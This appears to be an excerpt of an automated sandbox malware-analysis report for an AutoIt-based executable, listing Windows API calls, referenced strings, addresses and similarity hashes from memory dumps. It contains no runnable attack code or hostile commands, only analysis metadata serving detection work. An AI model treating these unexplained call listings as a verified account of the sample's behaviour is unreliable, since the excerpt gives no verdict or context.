• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Opcode ID: 408e36e3b25c3bae07384246ee2bf1944866489a8c5a24a2530d778713b5e232
• Instruction ID: b74aed839a741b5f3aa08817619007daf1b87ff0c8ae83e8a790112a2b006a98
• Opcode Fuzzy Hash: 408e36e3b25c3bae07384246ee2bf1944866489a8c5a24a2530d778713b5e232
• Instruction Fuzzy Hash: 7941D872604216BBEB14B7749C4BEBF7F6CFF85710F004459F908E6192EB349A01AAA5
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512C8C
• GetSystemMetrics.USER32(00000007), ref: 00512C94
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512CBF
• GetSystemMetrics.USER32(00000008), ref: 00512CC7
• GetSystemMetrics.USER32(00000004), ref: 00512CEC
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00512D09
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00512D19
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00512D4C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00512D60
• GetClientRect.USER32(00000000,000000FF), ref: 00512D7E
• GetStockObject.GDI32(00000011), ref: 00512D9A
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00512DA5
  • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
  • Part of subcall function 00512714: ScreenToClient.USER32(005D77B0,?), ref: 00512744
  • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
  • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
• SetTimer.USER32(00000000,00000000,00000028,005113C7), ref: 00512DCC
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI$hZ
• API String ID: 1458621304-3588766029
• Opcode ID: c20bf2dd2832b5aa5a8013ddab4a30c3162707214049469f45690058c00421e2
• Instruction ID: b3dda74d533c4f00f857da97243fd40c46b5ce6f0aeadfdb00a8b18b0080ebe2
• Opcode Fuzzy Hash: c20bf2dd2832b5aa5a8013ddab4a30c3162707214049469f45690058c00421e2
• Instruction Fuzzy Hash: 5AB17D71A0120AAFEB14DFA8CD49BED7FA4FB58315F10462AFA15A72D0DB70A850DF50
APIs
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
• GetForegroundWindow.USER32(005A0980,?,?,?,?,?), ref: 005304E3
• IsWindow.USER32(?), ref: 005666BB
Strings
Similarity
• API ID: Window$Foreground_memmove
• String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
• API String ID: 3828923867-1919597938
• Opcode ID: cd01a73ec46e1503a32ae63fdf2347808f6fa9231a668fd81633ed51f9d7eee3
• Instruction ID: 6cc04094af393cca48af23508c4f7029151a70e9d561dfe57d497ef51eb35c0b
• Opcode Fuzzy Hash: cd01a73ec46e1503a32ae63fdf2347808f6fa9231a668fd81633ed51f9d7eee3
• Instruction Fuzzy Hash: F6D1A130104703EFCB04EF60D4959AABFB5FF95348F104A19F496576A2DB30EA99CB92
APIs
• CharUpperBuffW.USER32(?,?), ref: 005944AC
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0059456C
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
• Opcode ID: 796240a5be76fafd36e9a54932220aae2dbc0e23e6cb719dc11ceb4b65f8803c
• Instruction ID: d58c833e4f668cbaa0f54c6228921db6a44b8e255230f6e6b50837a68371572f
• Opcode Fuzzy Hash: 796240a5be76fafd36e9a54932220aae2dbc0e23e6cb719dc11ceb4b65f8803c
• Instruction Fuzzy Hash: 77A159702146029FDB18EF60C965E6ABFA5FFC9314F144968F8969B2D2DB30EC06CB51
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 005856E1
• LoadCursorW.USER32(00000000,00007F8A), ref: 005856EC
• LoadCursorW.USER32(00000000,00007F00), ref: 005856F7
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00585702
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0058570D
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00585718
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00585723
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 0058572E
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00585739
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00585744
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 0058574F
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 0058575A
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00585765
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00585770
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0058577B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00585786
                                                                                                                                        • GetCursorInfo.USER32(?), ref: 00585796
                                                                                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 005857C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                        • Opcode ID: e0403d1ada9b603ecb4bce4a122cb029ce43a8c87ef16f6e086521dddf5ee5cb
                                                                                                                                        • Instruction ID: 2fecbac811bf87c693d08eb7d468c1b1921ee4e62a279f57882b548cd25c902e
                                                                                                                                        • Opcode Fuzzy Hash: e0403d1ada9b603ecb4bce4a122cb029ce43a8c87ef16f6e086521dddf5ee5cb
                                                                                                                                        • Instruction Fuzzy Hash: 8E415270E04319AADB109FBA8C49D6EFEB8EF51B50B10452FE509E7290DAB8A401CF61
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0056B17B
                                                                                                                                        • __swprintf.LIBCMT ref: 0056B21C
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B22F
                                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0056B284
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B2C0
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0056B2F7
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0056B349
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0056B37F
                                                                                                                                        • GetParent.USER32(?), ref: 0056B39D
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 0056B3A4
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0056B41E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B432
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0056B458
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B46C
                                                                                                                                          • Part of subcall function 0053385C: _iswctype.LIBCMT ref: 00533864
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                        • String ID: %s%u
                                                                                                                                        • API String ID: 3744389584-679674701
                                                                                                                                        • Opcode ID: b62d41876f133476dbdc21d151d9a3847546c1a87479330d2ad0ff67b57706d0
                                                                                                                                        • Instruction ID: 1f979c54e93c87807dce808204bf961824222fdaa8f0b40d3a7309a3e67da8f3
                                                                                                                                        • Opcode Fuzzy Hash: b62d41876f133476dbdc21d151d9a3847546c1a87479330d2ad0ff67b57706d0
                                                                                                                                        • Instruction Fuzzy Hash: 8AA1F171204306AFEB14DF24C884BAABFE9FF44355F008A29F999C3191DB30E995CB90
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0056BAB1
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BAC2
                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0056BAEA
                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0056BB07
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BB25
                                                                                                                                        • _wcsstr.LIBCMT ref: 0056BB36
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0056BB6E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BB7E
                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0056BBA5
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0056BBEE
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BBFE
                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0056BC26
                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 0056BC8F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                        • Opcode ID: 2b5ee09d9f810d03a2e59093bdb3dd1868ad12c3fae729a02e68a876b9c34195
                                                                                                                                        • Instruction ID: bd9c6a3fec60704b50fd94dad51819b396529058fcb8c12a53c07452a73f55dc
                                                                                                                                        • Opcode Fuzzy Hash: 2b5ee09d9f810d03a2e59093bdb3dd1868ad12c3fae729a02e68a876b9c34195
                                                                                                                                        • Instruction Fuzzy Hash: 62815C710042069BEB14DF14D885FAA7FA8FF95314F048569FD89DB0A6DB30DE89CBA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                        • Opcode ID: 0bdd8badd575367749ee8c1c5745a4965a68ec0bcc865d83248a69aaa6e4a6e0
                                                                                                                                        • Instruction ID: 236eb57fee77bbb4d236de360086a2092bcd30973adf98a37bf84a3999d2cb31
                                                                                                                                        • Opcode Fuzzy Hash: 0bdd8badd575367749ee8c1c5745a4965a68ec0bcc865d83248a69aaa6e4a6e0
                                                                                                                                        • Instruction Fuzzy Hash: 8B31F63194021AAAEB04FBA0DD4BFAE7FA4BF61354F200128F541F20D2EF656E40C656
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 0056CBAA
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0056CBBC
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0056CBD3
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0056CBE8
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0056CBEE
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0056CBFE
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0056CC04
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0056CC25
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0056CC3F
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0056CC48
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0056CCB3
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0056CCB9
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0056CCC0
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0056CD0C
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 0056CD19
                                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0056CD3E
                                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0056CD69
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3869813825-0
                                                                                                                                        • Opcode ID: e9531b18ad3b89bb72cfac24cd6c68377dba947df38bec465c7286fa775e4717
                                                                                                                                        • Instruction ID: a10d102b883a3c9211a2d5160d3128d2fa1e0f3cb36acc941e17fb773205b70b
                                                                                                                                        • Opcode Fuzzy Hash: e9531b18ad3b89bb72cfac24cd6c68377dba947df38bec465c7286fa775e4717
                                                                                                                                        • Instruction Fuzzy Hash: 03516C30900709AFEB20DFA8CE89B6EBFF5FF44705F004918E596A35A0D775A958DB50
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0059A87E
                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 0059A8F8
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A972
                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A994
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A9A7
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 0059A9C9
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 0059AA00
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059AA19
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0059AA32
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 0059AA39
                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0059AA51
                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0059AA69
                                                                                                                                          • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                        • API String ID: 1297703922-3619404913
                                                                                                                                        • Opcode ID: 5bc34cced55527973c1fc18ad6331f41323cf5c323f1078cdd60c98831e9a483
                                                                                                                                        • Instruction ID: ffe3cd1df40e80d76e842b2beac8328f6d1067dfdeccb2cabe773793d43b9966
                                                                                                                                        • Opcode Fuzzy Hash: 5bc34cced55527973c1fc18ad6331f41323cf5c323f1078cdd60c98831e9a483
                                                                                                                                        • Instruction Fuzzy Hash: 3771CD70550245AFDB21CF28CC48F6B7BE5FB99304F08051EF986872A1D770E949EBA6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 0059CCCF
                                                                                                                                          • Part of subcall function 0059B1A9: ClientToScreen.USER32(?,?), ref: 0059B1D2
                                                                                                                                          • Part of subcall function 0059B1A9: GetWindowRect.USER32(?,?), ref: 0059B248
                                                                                                                                          • Part of subcall function 0059B1A9: PtInRect.USER32(?,?,0059C6BC), ref: 0059B258
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CD38
                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0059CD43
                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0059CD66
                                                                                                                                        • _wcscat.LIBCMT ref: 0059CD96
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0059CDAD
                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0059CDC6
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CDDD
                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0059CDFF
                                                                                                                                        • DragFinish.SHELL32(?), ref: 0059CE06
                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0059CEF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                        • API String ID: 169749273-3440237614
                                                                                                                                        • Opcode ID: 63e3696d133315da8552789aae0473d5eb04e2837ebea3bf7973c888196c3a36
                                                                                                                                        • Instruction ID: b97797759bc733ee365c4429efe843b3c9c4b88c691cd1358d7c93f8ff719d1a
                                                                                                                                        • Opcode Fuzzy Hash: 63e3696d133315da8552789aae0473d5eb04e2837ebea3bf7973c888196c3a36
                                                                                                                                        • Instruction Fuzzy Hash: 8B614771108301AFDB11EF54D889D9BBFE8BBD9350F000A2EF595921A1DB709A49CB92
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0057831A
                                                                                                                                        • VariantCopy.OLEAUT32(00000000,?), ref: 00578323
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0057832F
                                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0057841D
                                                                                                                                        • __swprintf.LIBCMT ref: 0057844D
                                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00578479
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0057852A
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 005785BE
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00578618
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00578627
                                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00578665
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                        • API String ID: 3730832054-3931177956
                                                                                                                                        • Opcode ID: cdd6e2a7f1f73e20e32ff0e2ebc6aa7ab71cbe1d7dfd16da100d7e83932625bd
                                                                                                                                        • Instruction ID: a49b345b2da5c33c9a859e739e5c3eab85bce35c0a4a016aa28be3bfbd7afe86
                                                                                                                                        • Opcode Fuzzy Hash: cdd6e2a7f1f73e20e32ff0e2ebc6aa7ab71cbe1d7dfd16da100d7e83932625bd
                                                                                                                                        • Instruction Fuzzy Hash: DAD1CF71644516EBDB209FA9E89CB7EBFB4BF45700F14C955E40DAB280DF70A844EBA0
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00594A61
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00594AAC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                        • API String ID: 3974292440-4258414348
                                                                                                                                        • Opcode ID: e13c34d99c3b1e880cd8c7cde05320dcb95fc00284231707550aaf9bfbe3a3e1
                                                                                                                                        • Instruction ID: 10a9ac12c1641b23e4480a9d77a4f2821c30fac5f90e67c8c12e7aa6c7a34743
                                                                                                                                        • Opcode Fuzzy Hash: e13c34d99c3b1e880cd8c7cde05320dcb95fc00284231707550aaf9bfbe3a3e1
                                                                                                                                        • Instruction Fuzzy Hash: 3C9127742047129FCF08EF60C455A6ABFA2BF94354F148858E8965B3A2DB35ED4ACF81
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0059BF26
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005997E7), ref: 0059BF82
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059BFBB
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0059BFFE
                                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0059C035
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0059C041
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0059C051
                                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,005997E7), ref: 0059C060
                                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0059C07D
                                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0059C089
                                                                                                                                          • Part of subcall function 0053312D: __wcsicmp_l.LIBCMT ref: 005331B6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
